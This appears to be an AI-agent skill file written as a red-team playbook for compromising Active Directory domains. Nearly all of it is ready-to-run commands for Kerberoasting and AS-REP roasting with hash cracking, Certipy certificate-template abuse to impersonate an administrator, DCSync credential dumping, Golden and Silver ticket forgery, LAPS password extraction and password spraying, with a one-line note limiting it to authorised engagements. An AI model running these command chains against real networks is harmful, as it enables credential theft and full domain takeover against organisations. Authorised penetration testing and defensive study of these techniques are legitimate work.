| name | ad-attacks |
| description | Active Directory attack lane — BloodHound ingestion, Kerberoasting, AS-REP roasting, ADCS ESC1-ESC8 abuse, DCSync, LAPS extraction, and Pass-the-Hash/Ticket chains. |
Active Directory Attacks
AD attacks chain from credential capture → Kerberoasting → ADCS → DCSync to achieve domain compromise. Even a single low-privilege domain account is often enough.
Quick win order:
- BloodHound → identify shortest path to Domain Admin
- Kerberoasting → crack service account hashes
- ADCS audit → ESC1-ESC8 often trivially exploitable
- DCSync → if any principal has Replication Rights, game over
Scope note: Authorized internal VAPT/red team engagements only.
1. BloodHound Enumeration
bloodhound-python -u USER -p 'PASS' -d DOMAIN.LOCAL -ns DC_IP -c all --zip
bloodhound-python -u USER -p 'PASS' -d DOMAIN.LOCAL -ns DC_IP -c DCOnly --zip
Crown jewels to identify:
- Domain Admins group members
- krbtgt account (Golden Ticket target)
- Domain Controllers
- Accounts with DCSync rights (GetChangesAll)
- Certificate Authority servers
2. Kerberoasting
impacket-GetUserSPNs 'DOMAIN/USER:PASS' -dc-ip DC_IP -outputfile spn_hashes.txt
impacket-GetUserSPNs 'DOMAIN/USER:PASS' -dc-ip DC_IP -request-user TARGET_USER
hashcat -m 13100 spn_hashes.txt /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule
hashcat -m 13100 spn_hashes.txt /usr/share/wordlists/rockyou.txt --show
Get-DomainUser -SPN | Get-DomainSPNTicket -Format Hashcat | Export-Csv spns.csv
High-value SPN targets:
MSSQLSvc/ — SQL Server (often has local admin on DB hosts)
HTTP/ — Web services
cifs/ — File shares
host/ — Broad access principals
3. AS-REP Roasting
impacket-GetNPUsers 'DOMAIN/' -usersfile users.txt -dc-ip DC_IP -format hashcat -outputfile asrep_hashes.txt
impacket-GetNPUsers 'DOMAIN/USER:PASS' -dc-ip DC_IP -request -format hashcat
hashcat -m 18200 asrep_hashes.txt /usr/share/wordlists/rockyou.txt
ldapsearch -x -H ldap://DC_IP -D 'DOMAIN\USER' -w 'PASS' \
-b 'DC=DOMAIN,DC=LOCAL' '(&(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=4194304))' sAMAccountName
4. ADCS — Certificate Services Abuse
certipy find -u 'USER@DOMAIN' -p 'PASS' -dc-ip DC_IP -json > certipy_out.json
certipy find -u 'USER@DOMAIN' -p 'PASS' -dc-ip DC_IP -vulnerable
certipy req -u 'USER@DOMAIN' -p 'PASS' -dc-ip DC_IP \
-target CA_HOST -ca 'CA-NAME' -template 'VULNERABLE_TEMPLATE' \
-upn 'administrator@DOMAIN'
certipy auth -pfx administrator.pfx -dc-ip DC_IP
certipy relay -ca CA_HOST -template DomainController
certipy template -u 'USER@DOMAIN' -p 'PASS' -template 'TEMPLATE' -save-old
certipy template -u 'USER@DOMAIN' -p 'PASS' -template 'TEMPLATE' -configuration /tmp/esc4_config.json
ESC Checklist (most impactful):
| ESC | Description | Impact |
|---|
| ESC1 | Template allows SAN, any user can enroll | Any account → DA |
| ESC2 | Template with Any Purpose EKU | Auth as any user |
| ESC4 | Write access to certificate template | Modify to ESC1 |
| ESC6 | EDITF_ATTRIBUTESUBJECTALTNAME2 on CA | Any enrollment → SAN |
| ESC8 | NTLM relay to HTTP enrollment | Relay DC → DA |
5. DCSync
secretsdump.py 'DOMAIN/USER:PASS@DC_IP' -just-dc -outputfile dcsync_hashes
impacket-ticketer -nthash KRBTGT_HASH -domain-sid DOMAIN_SID -domain DOMAIN.LOCAL administrator
export KRB5CCNAME=administrator.ccache
psexec.py -k -no-pass DOMAIN.LOCAL/administrator@DC_FQDN
6. LAPS — Local Admin Password Extraction
Get-ADComputer -Filter * -Properties ms-Mcs-AdmPwd | Where-Object {$_."ms-Mcs-AdmPwd" -ne $null} | Select Name, "ms-Mcs-AdmPwd"
ldapsearch -x -H ldap://DC_IP -D 'DOMAIN\USER' -w 'PASS' \
-b 'DC=DOMAIN,DC=LOCAL' '(ms-Mcs-AdmPwd=*)' ms-Mcs-AdmPwd sAMAccountName
Get-LAPSPasswords
Find-LAPSDelegatedGroups
7. Golden / Silver Tickets
impacket-ticketer \
-nthash KRBTGT_NT_HASH \
-domain-sid S-1-5-21-XXXXXXXX \
-domain DOMAIN.LOCAL \
administrator
export KRB5CCNAME=administrator.ccache
wmiexec.py -k -no-pass DOMAIN.LOCAL/administrator@DC_FQDN
impacket-ticketer \
-nthash SERVICE_HASH \
-domain-sid DOMAIN_SID \
-domain DOMAIN.LOCAL \
-spn cifs/TARGET.DOMAIN.LOCAL \
-user-id 500 \
administrator
8. Quick Wins from Low-Priv Domain Account
impacket-GetNPUsers 'DOMAIN/USER:PASS' -dc-ip DC_IP -request -format hashcat
impacket-GetUserSPNs 'DOMAIN/USER:PASS' -dc-ip DC_IP -request
certipy find -u 'USER@DOMAIN' -p 'PASS' -dc-ip DC_IP -vulnerable
ldapsearch -x -H ldap://DC_IP -D 'DOMAIN\USER' -w 'PASS' \
-b 'DC=DOMAIN,DC=LOCAL' '(ms-Mcs-AdmPwd=*)' ms-Mcs-AdmPwd
nxc smb DC_IP -u users.txt -p 'PASS' --continue-on-success
bloodhound-python -u USER -p 'PASS' -d DOMAIN -ns DC_IP -c all --zip
MITRE ATT&CK Mapping
| Technique | ID | Tool |
|---|
| Kerberoasting | T1558.003 | GetUserSPNs, Rubeus |
| AS-REP Roasting | T1558.004 | GetNPUsers, Rubeus |
| DCSync | T1003.006 | secretsdump.py, Mimikatz |
| ADCS Abuse | T1649 | Certipy |
| LAPS Extraction | T1552.005 | LAPSToolkit, ldapsearch |
| Golden Ticket | T1558.001 | Mimikatz, ticketer |
| Silver Ticket | T1558.002 | Mimikatz, ticketer |
| BloodHound | T1615 | bloodhound-python |